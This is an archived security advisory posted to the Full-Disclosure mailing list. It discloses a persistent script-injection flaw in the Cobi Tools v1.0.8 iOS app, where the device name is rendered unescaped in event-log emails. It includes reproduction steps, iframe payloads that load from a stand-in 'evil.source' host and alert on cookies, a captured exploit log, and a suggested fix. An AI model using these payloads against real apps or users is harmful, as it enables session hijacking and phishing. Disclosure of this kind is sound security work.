lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <4a67c0ea-8205-16de-a988-571447da9799@vulnerability-lab.com>
Date: Wed, 11 Jan 2017 11:00:55 +0100
From: Vulnerability Lab <research@...nerability-lab.com>
To: fulldisclosure@...lists.org
Subject: [FD] Cobi Tools v1.0.8 iOS - Persistent Web Vulnerability

Document Title:
===============
Cobi Tools v1.0.8 iOS - Persistent Web Vulnerability


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2028


Release Date:
=============
2017-01-10


Vulnerability Laboratory ID (VL-ID):
====================================
2028


Common Vulnerability Scoring System:
====================================
3.5


Product & Service Introduction:
===============================
Cobi Tools allows your testers to e-mail their UDID from their phone. Console logs can also be emailed for debug assistance. 
For a more focused log, you can select various debug items to copy and email.

(Copy of the Homepage: http://www.appster.de/app/cobi-tools-375602941 )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent input validation vulnerability in the obi Tools v1.0.8 apple ios mobile application.


Vulnerability Disclosure Timeline:
==================================
2017-01-10: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Cobi Interactive
Product: Cobi Tools - Mobile Application 1.0.8


Exploitation Technique:
=======================
Local


Severity Level:
===============
Medium


Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the cobi tools v1.0.8 apple ios mobile application.
The vulnerability allows an attacker to inject own malicious script codes persistent on the application-side to compromise.

The persistent web vulnerability is located in the `devicename` parameter of the `eventlog email` module. Attackers are able 
to inject malicious script code as `devicename` to provoke an execution within the `email body message` context. The injection 
point is the devicename in the idevice settings. The execution point of the bug occurs in the message body of the eventlog email. 
The content of the eventlog that generates the email is not parsed at all.

The security risk of the web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.5. 
Exploitation of the web vulnerability requires a low privilege ios device account with restricted access and low user interaction. 
Successful exploitation of the vulnerability results in persistent phishing mails, session hijacking, persistent external redirect 
to malicious sources and application-side manipulation of affected or connected module context.

Vulnerable Module(s)
[+] EventLog
 
Vulnerable Input(s):
[+] name

Vulnerable Parameter(s)
[+] devicename

Affected Module(s)
[+] Mail Message Body (Email)


Proof of Concept (PoC):
=======================
The persistent validation vulnerability can be exploited by attackers with low privilege iOS device user account and without user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Install the application to your idevice (iphone or ipad)
2. Start the mobile application
3. Open the idevice ios settigs
4. Change the devicename to a maliciousc script code test payload
5. Save the entry and open the installed application again
6. Move to the eventlog and click on top the email button
7. The email opens and the execute takes place in the message body context
8. Successful reproduce of the vulnerability!


Payload:
<iframe src=http://evil.source/poc onload=alert(document.cookie)>
<iframe src=http://evil.source/poc onload=alert(document.domain)>


PoC: Exploitation (iPhone Device Log for Eth0)
<meta http-equiv="content-type" content="text/html; ">
<div><font size="1"><b>Device Name:</b> Eth0 "&gt;<iframe src=evil.source/poc onload=alert(document.cookie)>&gt;&lt;
br/&gt;&lt;b&gt;Model:&lt;/b&gt; iPhone&lt;br/&gt;&lt;b&gt;Version:&lt;/b&gt; 
iPhone OS 10.1.1&lt;br/&gt;&lt;b&gt;UDID:&lt;/b&gt; FFFFFF4E7CD51C52B248CD59812D49B7A83&lt;br/&gt;&lt;br/&gt;Device log by &lt;a 
href="<a href="http://www.cobiinteractive.com">http://www.cobiinteractive.com</a>"&gt;Cobi Tools&lt;/a&gt; iPhone App.&lt;/font&gt;&lt;/body&gt;&lt;html&gt;</iframe></font></div><div><br><br></div><br><fieldset class="mimeAttachmentHeader"><legend class="mimeAttachmentHeaderName">log.txt</legend></fieldset><br><div class="moz-text-plain"><pre wrap="">ÿþL</pre></div><BR/>
<div class="moz-text-plain"><pre wrap>
ÿþL</pre></div><BR><FIELDSET CLASS="mimeAttachmentHeader"></FIELDSET><BR/>
<html><head><meta http-equiv="content-type" content="text/html; "></head><body dir="auto"><div></div><div></div></body></html></body>
</html>


Solution - Fix & Patch:
=======================
The solution is to parse the devicename of the ios device within the email message body context. Disallow the usage of 
special chars for devicenames in the app to prevent local exploitation.


Security Risk:
==============
The security risk of the persistent input validation vulnerability in the cobi tools application is estimated as medium. (CVSS 3.5)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (research@...nerability-lab.com) [http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for 
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, 
deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com 		- www.vuln-lab.com 						- www.evolution-sec.com
Section:    magazine.vulnerability-lab.com 	- vulnerability-lab.com/contact.php 				- evolution-sec.com/contact
Social:	    twitter.com/vuln_lab		- facebook.com/VulnerabilityLab 				- youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php 	- vulnerability-lab.com/rss/rss_upcoming.php 			- vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php 	- vulnerability-lab.com/list-of-bug-bounty-programs.php 	- vulnerability-lab.com/register.php

Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark 
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get a ask permission.

				    Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]™



-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com



_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ